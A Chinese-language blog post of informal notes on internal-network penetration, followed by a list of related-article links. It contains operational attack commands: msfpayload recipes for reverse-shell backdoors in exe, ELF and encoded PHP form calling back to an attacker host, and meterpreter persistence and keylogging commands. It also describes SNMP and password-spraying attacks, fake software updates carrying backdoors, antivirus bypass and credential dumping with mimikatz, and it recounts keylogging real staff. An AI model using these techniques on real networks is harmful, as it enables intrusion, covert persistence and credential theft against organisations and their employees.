內網滲透隨想
0x00 前言
之前看到微博有人私信我說內網滲透的技巧,zone也有很多小夥伴問了一些內網滲透的問題,所以我就斗膽寫了這篇文章,有不對的,還請各位斧正
整個內網滲透肯定不是一篇兩篇文章能夠講述清楚的,所以標題寫作隨想,想到哪兒寫哪兒
0x01 內網代理和轉發
*簡單區分一下正向代理和反向代理
1.1 正向代理(Forward Proxy)
Lhost--》proxy--》Rhost
Lhost為了訪問到Rhost,向proxy傳送了一個請求並且指定目標是Rhost,然後proxy向Rhost轉交請求並將獲得的內容返回給Lhost,簡單來說正向代理就是proxy代替了我們去訪問Rhost。
1.2 反向代理(reverse proxy)
Lhost<--->proxy<--->firewall<--->Rhost
和正向代理相反(廢話),Lhost只向proxy傳送普通的請求,具體讓他轉到哪裡,proxy自己判斷,然後將返回的資料遞交回來,這樣的好處就是在某些防火牆只允許proxy資料進出的時候可以有效的進行穿透
1.3 簡單區分
正向代理是我們自己(Lhost)戴套(proxy)插進去,反向代理是她(Rhost)主動透過上位(proxy)坐上來(Lhost)
zone裡內網滲透代理問題有人問了如何代理進行內網滲透的問題
誠然,要進行內網滲透,代理是我們最先需要解決的問題,常見的代理方式大概可以分為這麼幾種:
2. VPN隧道/SSH隧道
這種代理方式需要比較高的許可權(system/root)直接使用系統功能來開啟內網代理的隧道,配置VPN都比較簡單,這裡不做贅述,我們看一看透過SSH隧道進行代理
#!bash
ssh -qTfnN -L port:host:hostport -l user remote_ip #正向隧道,監聽本地port
ssh -qTfnN -R port:host:hostport -l user remote_ip #反向隧道,用於內網穿透防火牆限制之類
SSH -qTfnN -D port remotehost #直接進行socks代理
引數詳解:
-q Quiet mode. 安靜模式
-T Disable pseudo-tty allocation. 不佔用 shell 了
-f Requests ssh to go to background just before command execution. 後臺執行,並推薦加上 -n 引數
-N Do not execute a remote command. 不執行遠端命令,埠轉發就用它了~
有時候,我們手邊沒有埠轉發的工具,也可以透過ssh來做埠轉發
#!bash
ssh -CfNg -L port1:127.0.0.1:port2 [email protected] #本地轉發
ssh -CfNg -R port2:127.0.0.1:port1 [email protected] #遠端轉發
大家可以參考這篇paper,非常棒SSH Port Forwarding
3. 透過HTTP service的代理
簡單來說就是在目標伺服器上傳一個webshell,透過shell來做所有的流量轉發到內網,常見的幾個工具有reGeorg,meterpreter,tunna等等,甚至直接寫一個簡單的代理指令碼,在自己機器上配置一下nginx直接進行反向代理
reGeorg自帶的說明已經很清楚了
Step 1. Upload tunnel.(aspx|ashx|jsp|php) to a webserver (How you do that is up to you)
Step 2. Configure you tools to use a socks proxy, use the ip address and port you specified when you started the reGeorgSocksProxy.py
** Note, if you tools, such as NMap doesn't support socks proxies, use [proxychains] (see wiki)
- Step 3. Hack the planet :)
注意安裝urllib3即可(regeorg很方便,我基本都用這個)
- meterpreter
msf非常強大,在進行內網滲透的時候不失為一個好的選擇,要用它進行代理,可以直接生成一個可執行檔案後門,然後返回meterpreter,也可以生成一個webshell來返回meterpreter,關於meterpreter,Dm老師已經說的非常清楚了metasploit 滲透測試筆記(meterpreter篇)
3.1 windows生成後門
#!bash
msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> X > shell.exe
3.2 Linux生成後門
#!bash
msfpayload linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -t elf -o shell
3.3 php後門
#!bash
msfpayload php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -e php/base64(可簡單編碼) -t raw -o base64php.php
獲得meterpreter會話後,就是msf盡情施展的時候了,最常用的辦法,新增路由表後,直接在會話中用msf的各種攻擊模組進行掃描(注意,這裡是可以進行跨網段掃描的)
如果單純只是想要進行簡單的代理工作,auxiliary/server/socks4a模組即可
這裡講到meterpreter所以多說一句,之前說的ssh隧道,如果嫌命令難得記,也可以簡單的透過msf來建立tunnel
#!bash
load meta_ssh
use multi/ssh/login_password
設定好引數後exploit即可獲取會話進行代理操作
- 直接透過webshell和nginx反向代理
http://zone.wooyun.org/content/11096
4. other tricks
python,ruby,perl等直接建立socks連線
lcx,tunna,htran等等進行埠流量轉發
shadowsocks,tor,goagent等等
直接現成的小東西:ssocks(一次比賽的時候死貓跟我推薦的)正向代理,反彈socks5均可
0x02 內網環境探測和資訊收集
因為一個完整的滲透很難涵蓋各種情況,所以這裡講的可能比較散,基本都是一些小技巧和思路
Nmap代理掃描進行主機發現
proxychains nmap ***
如果是meterpreter會話進行的代理,可直接透過
/usr/share/metasploit-framework/modules/auxiliary/scanner
指令碼來掃描即可檢視hosts獲取內網主機資訊
直接攻擊網段路由或交換機,簡單繪製內網的結構(我在從TCL某漏洞看內網滲透教學分享之內網資訊探測和後滲透準備中就是獲取了cisco路由的privilege15許可權,得到了內網結構,進一步進行跨vlan攻擊)
多嘗試交換機snmp弱口令,一旦成功,內網結構清晰
關於snmp滲透
使用了snmp管理的裝置,只需要community string即可,所以針對這個string爆破或者社工都是可行的,預設public/private
首先進行161埠掃描,發現snmp開放情況,透過弱口令檢視裝置資訊,在oid中讀取裝置密碼
例子:中國移動集團華為三層交換SNMP漏洞,可獲取管理帳號密碼,已成功登入
可以透過這個nmap和msf指令碼進行自動攻擊h3c-pt-tools
嘗試從主機的使用者目錄或者管理運維郵箱尋找敏感資訊(某次滲透即是keylogger運維後在測試機桌面獲取到拓撲和網段)
透過resolv.conf找到內網dns伺服器,或者字典窮舉dns
注意分析使用者的.bash_history,一般可以分析出使用者的使用習慣,紀錄等,獲取~/.shh/,嘗試配合history的連線紀錄直接透過金鑰登陸其他機器
0x03 內網滲透的常見攻擊技巧
透過之前的資訊收集和探測,判斷出主要的業務機器,如OA,dbserver,利用ssh信任,連入機器後匯出員工的userlist,做成針對性的字典,大部分內網的安全性都是脆弱的,且最容易出問題的就是口令安全(大公司也不例外)
%username%1
%username%12
%username%123
%username%1234
%username%12345
%username%123456
主要對ssh,dbserver,vnc,ftp進行爆破
對開了web service的server進行常規滲透,有可以減少工作量的辦法就是先對機器批次識別banner,透過banner判斷出cms或中介軟體,直接利用exp
中間人攻擊
常用ettercap,不建議做arp的mitm,可以嘗試dhcp mitm或者icmp mitm
也可以猥瑣一點,劫持外掛,攻擊閘道器,或者利用evilgrade去偽造軟體更新(如notepad++),然後捆綁上後門,直接打下工作機器,進入辦公網
簡單配置後用msf生成後門,start即可配合ettercap使用偽造軟體更新了
常見服務漏洞攻擊
smb/ms08067/ipc$/NetBIOS…………
但是在針對這些比較古老的漏洞攻擊時,很可能有AV攔截,所以在不同場景遇到的坑都不一樣
比如之前在西電DM牛告訴我,有AV,如果直接利用psexec返回會話,即會攔截,這時就可以利用powershell來bypass AVPowershell tricks::Bypass AV
0x04 後滲透準備和擴大戰果
一次完美的內網滲透肯定不是能夠一次性完成的,因為整個過程需要管理員的"配合"(口胡。。。)所以後滲透準備時很有必要的
1. 後門準備
msf的後門已經不錯,只需要稍加改造就能很好滿足我們的需求
普通msfpayload生成的後門不是持續性的,不利於我們下次繼續工作,所以需要一個持續性後門
msf的持續性後門有兩種,透過服務啟動(metsvc)和透過啟動項啟動(persistence)
透過服務的後門有個弊端,服務名稱是meterpreter,利用方式是: 上傳後門,透過metsvc安裝服務
#!bash
meterpreter > run metsvc
...(設定埠,並且上傳後門檔案)
use exploit/multi/handler
set PAYLOAD windows/metsvc_bind_tcp
exploit
透過啟動項的利用方式:
#!bash
meterpreter > run persistence -X -i 10 -p port -r hostip
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
當然,直接生成的後門有可能會被殺,所以這裡我推薦一個很不錯的工具,veil,之前再一次小型apt中用這個生成了的後門直接bypass了360
linux下有兩個常用的後門
mafix rookit和Cymothoa,後者聽說可以克隆root使用者,不過大部分的backdoor基本都相當於一個加密nc,會新開埠,所以如果webshell存活,可以直接考慮用webshell維持許可權
2. 鍵盤記錄
keylogger在內網滲透過程中(尤其是比較大的內網),起到很關鍵的作用,因為搞定一個密碼,有可能就搞定了一個網段
ixkeylog是我常用的一個,linux>=2.63均可使用
或者使用meterpreter會話的自帶鍵盤記錄功能
keyscan_start
keyscan_dump
用meterpreter有個好處,就是在win中可以做記憶體注入,不會建立程式
這裡說一個小tips,如果覺得keylogger動作大,可以進系統後把一些你需要的管理工具,如navicat,putty,PLSQL,SecureCRT之類全部選成記住密碼
3. hash
mimikatz,不用多說,利用meterpreter可以直接load模組
Quarks PwDump
wce
0x05 something else
內網滲透涉及的面很廣,本文主要說到的是一些很簡單的問題和常規的思路
尚未談到的 域滲透 印表機 辦公網嗅探 入侵日誌清理等等
如果有機會,日後慢慢補全
相關文章
- 內網滲透-初探域滲透2024-10-28內網
- 內網滲透工具2024-06-10內網
- Linux內網滲透2022-05-23Linux內網
- 工作組內網滲透2022-02-07內網
- 內網滲透-內網資訊收集2024-10-21內網
- metasploit滲透測試筆記(內網滲透篇)2020-08-19筆記內網
- Cobalt strike與內網滲透2020-08-31內網
- 內網滲透—流量轉發2020-07-12內網
- cmseasy&內網滲透 Writeup2021-08-19內網
- 什麼是內網滲透和外網滲透?有何區別?2023-12-13內網
- Me-and-My-Girlfriend-1靶機滲透 (Vulnhub內網滲透)2024-11-03內網
- 內網滲透應用 跨vlan滲透的一種思路2020-08-19內網
- 內網滲透-隧道代理轉發2024-10-11內網
- VMware搭建內網滲透環境2023-01-05內網
- Perun 內網滲透掃描神器2020-09-27內網
- 內網滲透 IPC$ [空連線]2020-09-30內網
- 內網滲透-防火牆資訊2020-12-06內網防火牆
- 內網滲透測試基礎2021-02-07內網
- 內網滲透 Metasploit(MSF)基礎使用2024-05-17內網
- 紅日靶場(內網滲透)——22022-05-15內網
- 內網滲透思路整理與工具使用2018-06-09內網
- 滲透測試基礎--內網轉發2024-07-13內網
- 內網滲透(八)橫向移不動2023-04-23內網
- 從零開始內網滲透學習2018-06-23內網
- 域內滲透基本技巧2020-08-19
- 內網滲透-橫向移動($IPC&at&schtasks)2021-05-15內網
- 9、Tunnel:論如何在內網中自由滲透2018-06-14內網
- 網站滲透思路2018-05-13網站
- 17、內網滲透測試定位技術總結2018-06-14內網
- 內網滲透測試時,通常的策略和方法如下:2024-06-25內網
- 內網滲透 day14-empire基礎命令的使用2020-11-14內網
- 網安之-=滲透思路2024-11-07
- 內網滲透思路探索 之新思路的探索與驗證2020-08-19內網
- 12、強大的內網域滲透提權分析工具——BloodHound2018-06-14內網
- 網路滲透實驗四2020-12-15
- beescms網站滲透測試2020-12-27網站
- 網路安全滲透測試2018-06-01
- 網站漏洞滲透測試服務內容詳情見解2019-09-18網站